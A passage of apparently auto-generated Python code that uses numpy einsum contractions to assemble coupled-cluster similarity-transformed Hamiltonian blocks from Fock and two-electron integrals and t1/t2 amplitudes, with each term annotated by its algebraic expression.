Hd0 += -1.000000000000000 * einsum('efab,an,bm->efmn', g[v, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# -0.5000 P(m,n)<j,i||a,b>*t2(a,b,n,i)*t2(e,f,m,j)
contracted_intermediate = -0.500000000000000 * einsum('jiab,abni,efmj->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 0.2500 <j,i||a,b>*t2(a,b,m,n)*t2(e,f,j,i)
Hd0 += 0.250000000000000 * einsum('jiab,abmn,efji->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# -0.5000 <j,i||a,b>*t2(a,e,j,i)*t2(b,f,m,n)
Hd0 += -0.500000000000000 * einsum('jiab,aeji,bfmn->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
# 1.0000 P(m,n)<j,i||a,b>*t2(a,e,n,i)*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,aeni,bfmj->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -0.5000 <j,i||a,b>*t2(a,e,m,n)*t2(b,f,j,i)
Hd0 += -0.500000000000000 * einsum('jiab,aemn,bfji->efmn', g[o, o, v, v], t2, t2, optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 P(m,n)<j,i||a,b>*t1(a,i)*t1(b,n)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,ai,bn,efmj->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# 1.0000 P(e,f)<j,i||a,b>*t1(a,i)*t1(e,j)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('jiab,ai,ej,bfmn->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# -0.5000 <j,i||a,b>*t1(a,n)*t1(b,m)*t2(e,f,j,i)
Hd0 += -0.500000000000000 * einsum('jiab,an,bm,efji->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# 1.0000 P(m,n)*P(e,f)<j,i||a,b>*t1(a,n)*t1(e,i)*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('jiab,an,ei,bfmj->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate) + -1.00000 * einsum('efmn->femn', contracted_intermediate) + 1.00000 * einsum('efmn->fenm', contracted_intermediate)
# -0.5000 <j,i||a,b>*t1(e,i)*t1(f,j)*t2(a,b,m,n)
Hd0 += -0.500000000000000 * einsum('jiab,ei,fj,abmn->efmn', g[o, o, v, v], t1, t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
# -1.0000 P(m,n)<j,i||a,n>*t1(a,m)*t1(e,i)*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('jian,am,ei,fj->efmn', g[o, o, v, o], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->efnm', contracted_intermediate)
# -1.0000 P(e,f)<i,e||a,b>*t1(a,n)*t1(b,m)*t1(f,i)
contracted_intermediate = -1.000000000000000 * einsum('ieab,an,bm,fi->efmn', g[o, v, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 2), (0, 1)])
Hd0 += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmn->femn', contracted_intermediate)
# 1.0000 <j,i||a,b>*t1(a,n)*t1(b,m)*t1(e,i)*t1(f,j)
Hd0 += 1.000000000000000 * einsum('jiab,an,bm,ei,fj->efmn', g[o, o, v, v], t1, t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 3), (0, 2), (0, 1)])
# H(0;i,j,a,b) = <0| e(-T) H e(T) e2(a,b,j,i)|0>
# 1.0000 <i,j||a,b>
H0d = 1.000000000000000 * einsum('ijab->abij', g[o, o, v, v])
# H(m,e;i,a) = <0|e1(m,e) e(-T) H e(T) e1(a,i)|0>
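    # Note: the d(e,a)*d(m,i) (Kronecker delta) terms below carry the
    # reference-block energy H(0;0) on the diagonal of this singles-singles block.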
# 1.0000 d(e,a)*d(m,i)*f(j,j)
Hss = 1.000000000000000 * einsum('ea,mi,jj->emai', kd[v, v], kd[o, o], f[o, o], optimize=['einsum_path', (0, 2), (0, 1)])
# -1.0000 d(e,a)*f(i,m)
Hss += -1.000000000000000 * einsum('ea,im->emai', kd[v, v], f[o, o])
# 1.0000 d(m,i)*f(e,a)
Hss += 1.000000000000000 * einsum('mi,ea->emai', kd[o, o], f[v, v])
# 1.0000 d(e,a)*d(m,i)*f(j,b)*t1(b,j)
Hss += 1.000000000000000 * einsum('ea,mi,jb,bj->emai', kd[v, v], kd[o, o], f[o, v], t1, optimize=['einsum_path', (2, 3), (0, 2), (0, 1)])
# -1.0000 d(e,a)*f(i,b)*t1(b,m)
Hss += -1.000000000000000 * einsum('ea,ib,bm->emai', kd[v, v], f[o, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(m,i)*f(j,a)*t1(e,j)
Hss += -1.000000000000000 * einsum('mi,ja,ej->emai', kd[o, o], f[o, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(e,a)*d(m,i)*<k,j||k,j>
Hss += -0.500000000000000 * einsum('ea,mi,kjkj->emai', kd[v, v], kd[o, o], g[o, o, o, o], optimize=['einsum_path', (0, 2), (0, 1)])
# 1.0000 <i,e||a,m>
Hss += 1.000000000000000 * einsum('ieam->emai', g[o, v, v, o])
# 1.0000 d(e,a)*<i,j||b,m>*t1(b,j)
Hss += 1.000000000000000 * einsum('ea,ijbm,bj->emai', kd[v, v], g[o, o, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 <i,j||a,m>*t1(e,j)
Hss += -1.000000000000000 * einsum('ijam,ej->emai', g[o, o, v, o], t1)
# 1.0000 d(m,i)*<j,e||b,a>*t1(b,j)
Hss += 1.000000000000000 * einsum('mi,jeba,bj->emai', kd[o, o], g[o, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 <i,e||b,a>*t1(b,m)
Hss += -1.000000000000000 * einsum('ieba,bm->emai', g[o, v, v, v], t1)
# 0.2500 d(e,a)*d(m,i)*<k,j||b,c>*t2(b,c,k,j)
Hss += 0.250000000000000 * einsum('ea,mi,kjbc,bckj->emai', kd[v, v], kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (2, 3), (0, 2), (0, 1)])
# -0.5000 d(e,a)*<i,j||b,c>*t2(b,c,m,j)
Hss += -0.500000000000000 * einsum('ea,ijbc,bcmj->emai', kd[v, v], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -0.5000 d(m,i)*<k,j||b,a>*t2(b,e,k,j)
Hss += -0.500000000000000 * einsum('mi,kjba,bekj->emai', kd[o, o], g[o, o, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 <i,j||b,a>*t2(b,e,m,j)
Hss += 1.000000000000000 * einsum('ijba,bemj->emai', g[o, o, v, v], t2)
# -0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,k)
Hss += -0.500000000000000 * einsum('ea,mi,kjbc,bj,ck->emai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (2, 3), (2, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||b,c>*t1(b,j)*t1(c,m)
Hss += 1.000000000000000 * einsum('ea,ijbc,bj,cm->emai', kd[v, v], g[o, o, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(m,i)*<k,j||b,a>*t1(b,j)*t1(e,k)
Hss += 1.000000000000000 * einsum('mi,kjba,bj,ek->emai', kd[o, o], g[o, o, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 <i,j||b,a>*t1(b,m)*t1(e,j)
Hss += 1.000000000000000 * einsum('ijba,bm,ej->emai', g[o, o, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1)])
# H(m,e;i,j,a,b) = <0|e1(m,e) e(-T) H e(T) e2(a,b,j,i)|0>
# -1.0000 d(e,b)*d(m,i)*f(j,a)
Hsd = -1.000000000000000 * einsum('eb,mi,ja->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,b)*d(m,j)*f(i,a)
Hsd += 1.000000000000000 * einsum('eb,mj,ia->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*f(j,b)
Hsd += 1.000000000000000 * einsum('ea,mi,jb->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(m,j)*f(i,b)
Hsd += -1.000000000000000 * einsum('ea,mj,ib->emabij', kd[v, v], kd[o, o], f[o, v], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,b)*<i,j||a,m>
Hsd += -1.000000000000000 * einsum('eb,ijam->emabij', kd[v, v], g[o, o, v, o])
# 1.0000 d(e,a)*<i,j||b,m>
Hsd += 1.000000000000000 * einsum('ea,ijbm->emabij', kd[v, v], g[o, o, v, o])
# -1.0000 d(m,i)*<j,e||a,b>
Hsd += -1.000000000000000 * einsum('mi,jeab->emabij', kd[o, o], g[o, v, v, v])
# 1.0000 d(m,j)*<i,e||a,b>
Hsd += 1.000000000000000 * einsum('mj,ieab->emabij', kd[o, o], g[o, v, v, v])
# 1.0000 d(e,b)*d(m,i)*<j,k||c,a>*t1(c,k)
Hsd += 1.000000000000000 * einsum('eb,mi,jkca,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,b)*d(m,j)*<i,k||c,a>*t1(c,k)
Hsd += -1.000000000000000 * einsum('eb,mj,ikca,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*<j,k||c,b>*t1(c,k)
Hsd += -1.000000000000000 * einsum('ea,mi,jkcb,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t1(c,k)
Hsd += 1.000000000000000 * einsum('ea,mj,ikcb,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*<i,j||c,a>*t1(c,m)
Hsd += 1.000000000000000 * einsum('eb,ijca,cm->emabij', kd[v, v], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||c,b>*t1(c,m)
Hsd += -1.000000000000000 * einsum('ea,ijcb,cm->emabij', kd[v, v], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,i)*<j,k||a,b>*t1(e,k)
Hsd += 1.000000000000000 * einsum('mi,jkab,ek->emabij', kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(m,j)*<i,k||a,b>*t1(e,k)
Hsd += -1.000000000000000 * einsum('mj,ikab,ek->emabij', kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# H(m,n,e,f;i,a) = <0|e2(m,n,f,e) e(-T) H e(T) e1(a,i)|0>
# -1.0000 d(f,a)*d(m,i)*f(e,n)
Hds = -1.000000000000000 * einsum('fa,mi,en->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(n,i)*f(e,m)
Hds += 1.000000000000000 * einsum('fa,ni,em->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*f(f,n)
Hds += 1.000000000000000 * einsum('ea,mi,fn->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(n,i)*f(f,m)
Hds += -1.000000000000000 * einsum('ea,ni,fm->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(m,i)*f(j,n)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,mi,jn,ej->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,n)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,mi,jn,fj->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,m)*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ni,jm,ej->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,m)*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ni,jm,fj->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*f(e,b)*t1(b,n)
Hds += -1.000000000000000 * einsum('fa,mi,eb,bn->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*f(e,b)*t1(b,m)
Hds += 1.000000000000000 * einsum('fa,ni,eb,bm->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*f(f,b)*t1(b,n)
Hds += 1.000000000000000 * einsum('ea,mi,fb,bn->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*f(f,b)*t1(b,m)
Hds += -1.000000000000000 * einsum('ea,ni,fb,bm->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*f(j,b)*t2(b,e,n,j)
Hds += 1.000000000000000 * einsum('fa,mi,jb,benj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,b)*t2(b,e,m,j)
Hds += -1.000000000000000 * einsum('fa,ni,jb,bemj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*f(i,b)*t2(b,e,m,n)
Hds += 1.000000000000000 * einsum('fa,ib,bemn->efmnai', kd[v, v], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,b)*t2(b,f,n,j)
Hds += -1.000000000000000 * einsum('ea,mi,jb,bfnj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,b)*t2(b,f,m,j)
Hds += 1.000000000000000 * einsum('ea,ni,jb,bfmj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*f(i,b)*t2(b,f,m,n)
Hds += -1.000000000000000 * einsum('ea,ib,bfmn->efmnai', kd[v, v], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,i)*f(j,a)*t2(e,f,n,j)
Hds += 1.000000000000000 * einsum('mi,ja,efnj->efmnai', kd[o, o], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(n,i)*f(j,a)*t2(e,f,m,j)
Hds += -1.000000000000000 * einsum('ni,ja,efmj->efmnai', kd[o, o], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*f(j,b)*t1(b,n)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,mi,jb,bn,ej->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,b)*t1(b,n)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,mi,jb,bn,fj->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,b)*t1(b,m)*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ni,jb,bm,ej->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,b)*t1(b,m)*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ni,jb,bm,fj->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*<i,e||m,n>
Hds += 1.000000000000000 * einsum('fa,iemn->efmnai', kd[v, v], g[o, v, o, o])
# -1.0000 d(e,a)*<i,f||m,n>
Hds += -1.000000000000000 * einsum('ea,ifmn->efmnai', kd[v, v], g[o, v, o, o])
# 1.0000 d(m,i)*<e,f||a,n>
Hds += 1.000000000000000 * einsum('mi,efan->efmnai', kd[o, o], g[v, v, v, o])
# -1.0000 d(n,i)*<e,f||a,m>
Hds += -1.000000000000000 * einsum('ni,efam->efmnai', kd[o, o], g[v, v, v, o])
# -1.0000 d(f,a)*<i,j||m,n>*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ijmn,ej->efmnai', kd[v, v], g[o, o, o, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||m,n>*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ijmn,fj->efmnai', kd[v, v], g[o, o, o, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,n>*t1(b,j)
Hds += -1.000000000000000 * einsum('fa,mi,jebn,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(m,n)d(f,a)*<i,e||b,n>*t1(b,m)
contracted_intermediate = 1.000000000000000 * einsum('fa,iebn,bm->efmnai', kd[v, v], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 1.0000 P(e,f)d(m,i)*<j,e||a,n>*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('mi,jean,fj->efmnai', kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(f,a)*d(n,i)*<j,e||b,m>*t1(b,j)
Hds += 1.000000000000000 * einsum('fa,ni,jebm,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(e,f)d(n,i)*<j,e||a,m>*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('ni,jeam,fj->efmnai', kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(e,a)*d(m,i)*<j,f||b,n>*t1(b,j)
Hds += 1.000000000000000 * einsum('ea,mi,jfbn,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(m,n)d(e,a)*<i,f||b,n>*t1(b,m)
contracted_intermediate = -1.000000000000000 * einsum('ea,ifbn,bm->efmnai', kd[v, v], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -1.0000 d(e,a)*d(n,i)*<j,f||b,m>*t1(b,j)
Hds += -1.000000000000000 * einsum('ea,ni,jfbm,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(m,i)*<e,f||b,a>*t1(b,n)
Hds += -1.000000000000000 * einsum('mi,efba,bn->efmnai', kd[o, o], g[v, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(n,i)*<e,f||b,a>*t1(b,m)
Hds += 1.000000000000000 * einsum('ni,efba,bm->efmnai', kd[o, o], g[v, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(f,a)*d(m,i)*<k,j||b,n>*t2(b,e,k,j)
Hds += 0.500000000000000 * einsum('fa,mi,kjbn,bekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(m,n)d(f,a)*<i,j||b,n>*t2(b,e,m,j)
contracted_intermediate = -1.000000000000000 * einsum('fa,ijbn,bemj->efmnai', kd[v, v], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(e,a)*d(m,i)*<k,j||b,n>*t2(b,f,k,j)
Hds += -0.500000000000000 * einsum('ea,mi,kjbn,bfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(m,n)d(e,a)*<i,j||b,n>*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ea,ijbn,bfmj->efmnai', kd[v, v], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(m,i)*<k,j||a,n>*t2(e,f,k,j)
Hds += 0.500000000000000 * einsum('mi,kjan,efkj->efmnai', kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 P(m,n)<i,j||a,n>*t2(e,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('ijan,efmj->efmnai', g[o, o, v, o], t2)
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(f,a)*d(n,i)*<k,j||b,m>*t2(b,e,k,j)
Hds += -0.500000000000000 * einsum('fa,ni,kjbm,bekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(e,a)*d(n,i)*<k,j||b,m>*t2(b,f,k,j)
Hds += 0.500000000000000 * einsum('ea,ni,kjbm,bfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(n,i)*<k,j||a,m>*t2(e,f,k,j)
Hds += -0.500000000000000 * einsum('ni,kjam,efkj->efmnai', kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(f,a)*d(m,i)*<j,e||b,c>*t2(b,c,n,j)
Hds += 0.500000000000000 * einsum('fa,mi,jebc,bcnj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,a)*d(n,i)*<j,e||b,c>*t2(b,c,m,j)
Hds += -0.500000000000000 * einsum('fa,ni,jebc,bcmj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(f,a)*<i,e||b,c>*t2(b,c,m,n)
Hds += 0.500000000000000 * einsum('fa,iebc,bcmn->efmnai', kd[v, v], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 P(e,f)d(m,i)*<j,e||b,a>*t2(b,f,n,j)
contracted_intermediate = -1.000000000000000 * einsum('mi,jeba,bfnj->efmnai', kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)d(n,i)*<j,e||b,a>*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ni,jeba,bfmj->efmnai', kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -1.0000 P(e,f)<i,e||b,a>*t2(b,f,m,n)
contracted_intermediate = -1.000000000000000 * einsum('ieba,bfmn->efmnai', g[o, v, v, v], t2)
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -0.5000 d(e,a)*d(m,i)*<j,f||b,c>*t2(b,c,n,j)
Hds += -0.500000000000000 * einsum('ea,mi,jfbc,bcnj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(e,a)*d(n,i)*<j,f||b,c>*t2(b,c,m,j)
Hds += 0.500000000000000 * einsum('ea,ni,jfbc,bcmj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(e,a)*<i,f||b,c>*t2(b,c,m,n)
Hds += -0.500000000000000 * einsum('ea,ifbc,bcmn->efmnai', kd[v, v], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t2(c,e,n,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbc,bj,cenk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t2(c,e,m,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbc,bj,cemk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*<i,j||b,c>*t1(b,j)*t2(c,e,m,n)
Hds += -1.000000000000000 * einsum('fa,ijbc,bj,cemn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t2(c,f,n,k)
Hds += 1.000000000000000 * einsum('ea,mi,kjbc,bj,cfnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t2(c,f,m,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbc,bj,cfmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||b,c>*t1(b,j)*t2(c,f,m,n)
Hds += 1.000000000000000 * einsum('ea,ijbc,bj,cfmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(m,i)*<k,j||b,a>*t1(b,j)*t2(e,f,n,k)
Hds += -1.000000000000000 * einsum('mi,kjba,bj,efnk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(n,i)*<k,j||b,a>*t1(b,j)*t2(e,f,m,k)
Hds += 1.000000000000000 * einsum('ni,kjba,bj,efmk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,n)*t2(c,e,k,j)
Hds += -0.500000000000000 * einsum('fa,mi,kjbc,bn,cekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
